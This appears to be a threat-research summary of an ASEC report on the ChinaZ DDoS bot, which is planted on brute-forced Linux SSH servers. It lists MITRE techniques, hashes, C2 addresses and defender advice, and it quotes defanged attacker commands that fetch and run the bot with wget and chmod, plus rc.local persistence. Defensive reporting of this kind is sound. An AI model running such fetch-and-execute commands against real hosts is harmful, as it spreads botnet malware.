Threat Research

ChinaZ DDoS Bot Malware Distributed to Linux SSH Servers – ASEC BLOG

Securonix

ChinaZ DDoSBot has been found installed on poorly managed Linux SSH servers, turning compromised hosts into bots capable of performing DDoS attacks. The article details Linux and Windows variants, their C2 communications, persistence mechanisms, and defender guidance to mitigate such infections.
#ChinaZ #DDoSClient #LinuxSSH

Keypoints

  • ChinaZ DDoSClient is deployed on inadequately managed Linux SSH servers, enabling a botnet for DDoS operations.
  • Threat actors use SSH brute-force/dictionary attacks after port scanning (port 22) to gain initial access.
  • Once inside, the malware is installed (often via wget), made persistent (rc.local), and may disable defenses such as iptables.
  • Linux and Windows variants disguise themselves (e.g., as “declient”) and collect system information before reporting to C2.
  • ChinaZ supports multiple DDoS commands (SYN, UDP, ICMP, DNS Floods) and can be instructed to change C2 addresses or update CPU limits.
  • Defensive guidance includes strong passwords, timely patching, firewall use, and updating to the latest version to block infections.

MITRE Techniques

  • [T1046] Network Service Scanning – The threat actor scanned port 22, the area where SSH services operate, before finding an active SSH service and performing a dictionary attack using commonly used SSH account credentials. “scanned port 22, the area where SSH services operate, before finding an active SSH service and performing a dictionary attack using commonly used SSH account credentials.”
  • [T1110] Brute Force – Dictionary attack using commonly used SSH account credentials to gain access.
  • [T1105] Ingress Tool Transfer – The threat actor used wget to download ChinaZ (e.g., “wget hxxp://45.113.163[.]219/linux64”).
  • [T1059.004] Unix Shell – After gaining access, the attacker runs shell commands to install and execute the malware (e.g., “chmod 777 linux64” and “./linux64”).
  • [T1036] Masquerading – ChinaZ disguises itself as “declient” by setting the process name to that value. “disguises itself with the name ‘declient’.”
  • [T1547] Boot or Logon Autostart Execution – Persistence achieved by registering to rc.local to run after reboots. “registered to rc.local to maintain persistence so that it would operate even after reboots.”
  • [T1027] Obfuscated/Compressed Files and Information – The C&C address is encoded in ChinaZ and decrypted at runtime. “The C&C server address is encoded in ChinaZ, but it can easily be retrieved through a decryption routine…”
  • [T1041] Exfiltration Over C2 Channel – Infected systems’ information is transmitted to the C2 server via SendOnlineInfo. “The information that is transmitted is LOGININFO struct and it has the following structure.”
  • [T1499] Network Denial of Service – ChinaZ can perform DDoS attacks (SYN, UDP, ICMP, DNS Flood) under commands from the C2. “Most of the commands supported by the DDoS bot, ChinaZ, are characteristically DDoS attack commands.”

Indicators of Compromise

  • [MD5] Linux x86 (linux32) – c69f5eb555cc10f050375353c205d5fa
  • [MD5] Linux x64 (linux64) – c9eb0815129c135db5bbb8ac79686b9a
  • [MD5] Windows x86 (win32) – 2ec7348e6b6b32d50a01c3ffe480ef70
  • [URL] Linux/Linux32 download – hxxp://45.113.163[.]219/linux32
  • [URL] Linux/Linux64 download – hxxp://45.113.163[.]219/linux64
  • [URL] Windows/WIN32 download – hxxp://45.113.163[.]219/win32
  • [URL] C2 address – 45.113.163[.]219:29134
  • [URL] C2 domain – www[.]911ddos[.]com:10912
  • [Signature] Linux Ddos detections – Linux/Ddos.1571389, Linux/Ddos.1806356
  • [Signature] Windows Trojan detections – Trojan/Win32.Agent.R192331

Read more: https://asec.ahnlab.com/en/50316/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint